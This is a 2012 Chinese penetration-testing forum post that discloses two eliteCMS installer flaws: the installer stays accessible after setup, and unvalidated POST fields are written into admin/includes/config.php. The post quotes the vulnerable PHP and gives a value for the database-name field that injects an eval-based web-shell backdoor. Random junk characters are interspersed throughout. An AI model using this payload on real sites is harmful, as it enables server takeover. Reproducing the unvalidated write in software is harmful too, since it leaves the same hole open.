中国网络渗透测试联盟

标题: eliteCMS安装文件未验证 + 一句话写入安全漏洞 [打印本页]
作者: admin    时间: 2012-11-18 13:59
标题: eliteCMS安装文件未验证 + 一句话写入安全漏洞
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装" ~, K% g0 m  g# J7 H3 \, B

8 r1 T/ `0 P* R" J3 D另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
8 H4 q( [- P/ {) d$ R. U: @我们来看代码:
' d* `. E# _- E9 P- a9 J! V9 @5 n6 J ! ?& G, t: X; o" z+ o  A
...
2 x- R: B8 h$ d. U% ]/ `# nelseif ($_GET['step'] == "4") {
! V6 L: T+ y4 |0 d& B, ~5 s    $file = "../admin/includes/config.php";  Z5 O! n3 b/ m2 ~8 n
    $write = "<?php\n";
3 P" }/ ]7 Q8 T6 l" z7 g$ d    $write .= "/**\n";" |, F# s1 p8 c+ }& A2 Z
    $write .= "*\n";
8 w9 T9 g$ V" N) E2 M) K3 x    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";* f$ n9 V5 j3 k. u7 L
...略...8 p2 h) B4 v* |: z4 O. J
    $write .= "*\n";* K' K& ?' y. n; k/ L
    $write .= "*/\n";
) D& ~" l0 k2 W: K( J    $write .= "\n";
9 f% u+ m2 H9 n* n# e    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
$ {/ q8 l. w" _* z    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";' d; g4 O7 {% J( q' u6 Q. y
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
* o7 k' C! W+ r! {, w% G    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
1 `6 o( }0 w  C1 y. P" Q* ~    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";" v7 G- Z' P4 `
    $write .= "if (!\$connection) {\n";; v8 Z7 m$ x( T% I9 P/ y9 j
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
$ i* R' A, x6 A1 x& ~5 Y    $write .= "        \n";
' i- \8 t5 G/ V% T    $write .= "} \n";
6 D) P0 X. i" G    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
% B4 B. i2 r8 c3 m    $write .= "if (!\$db_select) {\n";1 L4 t& S- r& }9 ?- G+ K
    $write .= "        die(\"Database select failed\" .mysql_error());\n";6 `; C' J" A% w8 x; K
    $write .= "        \n";
- Y7 F  l5 p) B' W/ L    $write .= "} \n";
* o! k  E: R1 S  k5 j3 u3 g    $write .= "?>\n";/ o( N: ?5 c6 a+ z+ N
$ C, z! C- N/ ^
    $writer = fopen($file, 'w');
+ `9 \8 J8 S# j7 ^5 q) g...9 {8 p! V+ ]2 r  B) n7 o& G: ^4 t  j

( M  k# q9 t& F5 _在看代码:
9 W! ?& ~; v, g# D  o: `( c. k1 j8 o ( z( f$ k! q* X7 R
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
( p# W$ u  |3 F: ?/ }) S1 V$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
: v  R4 j4 C9 N$_SESSION['DB_USER'] = $_POST['DB_USER'];
2 ~6 y5 P: u( B* ^$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
, I. r6 M* A! A( e5 B$ R. G 4 o( P3 m! V6 N$ g% D
取值未作任何验证
) o% I% v0 N6 P. u4 f+ t如果将数据库名POST数据:
2 G1 N# l" m- c  ?
  o! x; w) H) ?% T6 \/ ~' v"?><?php eval($_POST[c]);?><?php6 H3 A' Q7 P5 j! Y7 s  n9 b: v
/ N: M- ?1 @0 Y  p7 {" K
将导致一句话后门写入/admin/includes/config.php) w* b. \' a* E% x




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2